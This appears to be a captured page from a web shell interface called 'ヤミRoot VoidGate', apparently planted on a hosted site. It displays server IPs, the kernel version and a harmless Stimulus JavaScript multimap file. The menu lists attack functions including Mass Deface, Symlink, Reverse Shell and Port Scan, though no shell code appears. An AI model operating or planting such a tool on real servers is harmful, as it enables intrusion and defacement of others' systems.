ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
node_modules
/
@stimulus
/
multimap
/
dist
/
Viewing: indexed_multimap.js
var __extends = (this && this.__extends) || (function () { var extendStatics = function (d, b) { extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return extendStatics(d, b); }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); import { Multimap } from "./multimap"; import { add, del } from "./set_operations"; var IndexedMultimap = /** @class */ (function (_super) { __extends(IndexedMultimap, _super); function IndexedMultimap() { var _this = _super.call(this) || this; _this.keysByValue = new Map; return _this; } Object.defineProperty(IndexedMultimap.prototype, "values", { get: function () { return Array.from(this.keysByValue.keys()); }, enumerable: false, configurable: true }); IndexedMultimap.prototype.add = function (key, value) { _super.prototype.add.call(this, key, value); add(this.keysByValue, value, key); }; IndexedMultimap.prototype.delete = function (key, value) { _super.prototype.delete.call(this, key, value); del(this.keysByValue, value, key); }; IndexedMultimap.prototype.hasValue = function (value) { return this.keysByValue.has(value); }; IndexedMultimap.prototype.getKeysForValue = function (value) { var set = this.keysByValue.get(value); return set ? Array.from(set) : []; }; return IndexedMultimap; }(Multimap)); export { IndexedMultimap }; //# sourceMappingURL=indexed_multimap.js.map
Coded With 💗 by
0x6ick